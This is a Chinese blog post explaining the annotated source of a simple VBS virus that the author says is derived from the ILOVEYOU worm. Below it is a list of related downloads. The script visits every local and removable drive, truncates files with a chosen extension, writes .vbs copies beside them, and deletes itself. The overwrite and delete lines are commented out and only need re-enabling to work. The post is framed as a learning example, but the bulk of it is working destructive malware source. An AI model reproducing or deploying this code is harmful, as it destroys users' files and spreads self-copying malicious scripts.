`
hereson
  • 浏览: 1444689 次
  • 性别: Icon_minigender_1
  • 来自: 苏州
社区版块
存档分类
最新评论

vbs病毒的简单例子源代码解析

    博客分类:
  • vbs
阅读更多
说明:作者对某些代码进行了修改。该文件是一个完整的程序。该文件执行之后,会寻找硬盘上所有满足条件的文件,对其进行强制性覆盖(满足条件的文件数据将全部丢失)、并再创建一个相同文件名但后带.vbs的文件。因此,请注意设立好破坏测试条件,千万不要对他人进行测试,否则,一切后果自负。

dim folder,fso,foldername,f,d,dc

set fso=createobject("scripting.filesystemobject")

set self=fso.opentextfile(wscript.scriptfullname,1)

vbscopy=self.readall '读取病毒体,以备复制到文件

self.close

set dc=fso.Drives

for each d in dc

if d.drivetype=3 or d.drivetype=2 then '检查磁盘类型

wscript.echo d '弹出窗口,显示找到盘符

scan(d)

end if

next 

lsfile=wscript.scriptfullname '该脚本程序路径

set lsfile=fso.getfile(lsfile)

lsfile.delete(true) '病毒运行后自我删除(本人自加,爱虫病毒本身没有该代码)

sub scan(folder_)

on error resume next

set folder_=fso.getfolder(folder_)

set files=folder_.files

for each file in files

ext=fso.GetExtensionName(file) '获取文件后缀

ext=lcase(ext) '后缀名转换成小写字母

if ext="mp5" then '如果后缀名是mp5,当然不存在这种文件,这里可以自己修改,但是注意。请自己建立相应后缀名的文件,最好是非正常后缀名

set ap=fso.opentextfile(file.path,2,true) 

' ap.write vbscopy '覆盖文件,慎用

ap.close

set cop=fso.getfile(file.path)

cop.copy(file.path & ".vbs") '创建另外一个病毒文件

' file.delete(true) '删除原来文件

end if

next

set subfolders=folder_.subfolders

for each subfolder in subfolders '搜索其他目录

scan(subfolder)

next 

end sub

分享到:
评论

相关推荐

    用VBS获取网页源代码.vbs

    用VBS获取网页源代码.vbs set http=createobject("Microsoft.XMLHTTP") '\\调用XMLHTTP对象 url="http://www.119880.com/qq.txt" '\\赋予变量URL值 Set hhh = createObject("Microsoft.XMLHTTP") hhh.open "get",...

    VBS病毒防御知识

    2. Windows Script Host支持:VBS病毒通过Windows Script Host执行脚本代码,这是Windows操作系统内置的一个组件,用于执行各种脚本语言,如VBS、JScript等。 3. Wscript.exe执行:VBS病毒依赖于Wscript.exe这个可...

    修复被vbs病毒感染的html文件小工具

    -- 和 -->)来隐藏其代码,避免被普通用户或简单的反病毒软件检测到。 修复工具“repairVBSCN.exe”可能是专门设计来扫描、识别并清除这种特定VBS病毒感染的程序。它可能包含了一套规则库,用于匹配和删除已知的VBS...

    VBS蠕虫病毒分析研究及防护措施

    VBS蠕虫病毒分析研究及防护措施 只有有vbs代码段分析说明,文字描述,和预防vbs病毒措施

    AnnaKournikova病毒源代码解析

    【AnnaKournikova病毒源代码解析】 AnnaKournikova病毒是一款早期的蠕虫病毒,主要通过电子邮件传播,利用Microsoft的Visual Basic Script (VBS)编写。此病毒利用了当时用户对网球明星安娜·库尔尼科娃的知名度,...

    新欢乐时光病毒源代码分析

    新欢乐时光病毒源代码分析 新欢乐时光病毒是一种基于VBS脚本的计算机病毒,通过感染本地或者共享上的HTML文件和VBScript文件来传播。该病毒的主要功能是感染本地或者共享上的文件,并将自身代码追加到这些文件中,...

    vbs病毒专杀工具

    5. **使用方法**:VBS病毒专杀工具的操作通常非常简单。用户只需运行该工具,按照提示进行全盘扫描或自定义扫描。找到病毒后,工具会提供清理选项,用户确认后即可清除病毒。在清除过程中,建议用户关闭所有程序,以...

    修复被vbs病毒感染的html文件自用工具

    VBS病毒是一种利用VBScript脚本语言编写的恶意代码,它可能通过电子邮件、网络下载或其他感染途径潜入用户的计算机系统,对HTML文件进行篡改,植入恶意代码,影响系统的正常运行。 描述中提到的“修复被vbs病毒感染...

    VBS病毒专杀工具

    VBS病毒,全称为Visual Basic Script(VB脚本)病毒,是一种基于Microsoft Visual Basic Script编程语言编写的恶意软件。这种病毒通常通过电子邮件、网络下载、U盘等途径传播,一旦感染,可能会对用户的计算机系统...

    去除隐藏文件夹病毒(去除VBS病毒)找回隐藏文件夹 第二版

    例如,著名的ILOVEYOU蠕虫就是VBS病毒的一个实例,它通过电子邮件传播,破坏了大量的计算机系统。 3. **去除方法**: - 安全模式启动:在安全模式下,许多病毒不会自动运行,这为清理提供了机会。 - 反病毒软件:...

    vbs 病毒专杀工具2.0

    该工具利用深度扫描技术和恶意代码行为分析,能够有效地检测和清除系统中的VBS病毒,尤其是那些藏匿在快捷方式中的恶意代码。 对于"暴风一号"病毒,其主要特点包括: 1. **自我复制**:通过修改系统文件或创建快捷...

    VBS实例 44个 vbs脚本实例

    VBS实例 44个 vbs脚本实例, VBS取QQ-TM号码的自动登录命令行.vbs 妙用脚本清除电脑中的痕迹.vbs 后台字典文件管理器.vbs 定时关机.vbs 列出管理工具集.vbs 旁注查询工具.vbs 中文姓名笔画计算(VBS脚本版).vbs ...

    vbs关闭计算机源代码

    vbs关闭计算机源代码

    72055569.vbs病毒专杀

    本病毒目前非常流行,不过很垃圾, 使用本软件可以彻底清除该病毒, 大家也可以手动杀毒, (本软件送给中南民大论坛的水花兄以及所有被该病毒骚扰的水友们,谢谢你们的支持!) 本病毒手动杀毒方法: 1.开机时按F8...

    Autorun.vbs病毒专杀工具.rar

    标题中的“Autorun.vbs病毒专杀工具.rar”表明这是一个针对特定病毒的解决方案,该病毒被称为Autorun.vbs。在Windows系统中,autorun.inf文件常被用来自动执行磁盘上的程序,而当这种功能被恶意利用时,就可能成为...

    vbs文件夹病毒专杀

    VBS文件夹病毒是一种利用VBScript编程语言编写的恶意软件,它们通常隐藏在电子邮件、可移动存储设备或网络下载中,一旦激活,就会对用户的计算机系统造成严重破坏。这种病毒的特点是自我复制,并可能感染系统中的...

    VBS源代码加密工具 V1.0

    《VBS源代码加密工具 V1.0.exe》 程序功能:用于对VBS格式的源代码进行加密,将VBS格式的源程序加密成VBE格式的加密程序。 使用方法:将VBS格式的文件或包含有VBS格式文件的文件夹拖到《VBS源代码加密工具 V1.0.exe...

    VBS脚本病毒原理分析及防范

    分析VBS脚本病毒的原理,并给出了防范措施。

    电脑学习vbs整蛊代码.vbs

    电脑学习vbs整蛊代码.vbs电脑学习vbs整蛊代码.vbs电脑学习vbs整蛊代码.vbs电脑学习vbs整蛊代码.vbs电脑学习vbs整蛊代码.vbs电脑学习vbs整蛊代码.vbs电脑学习vbs整蛊代码.vbs电脑学习vbs整蛊代码.vbs电脑学习vbs整蛊...

    简单的刷屏代码.vbs

    简单的刷屏代码,

Global site tag (gtag.js) - Google Analytics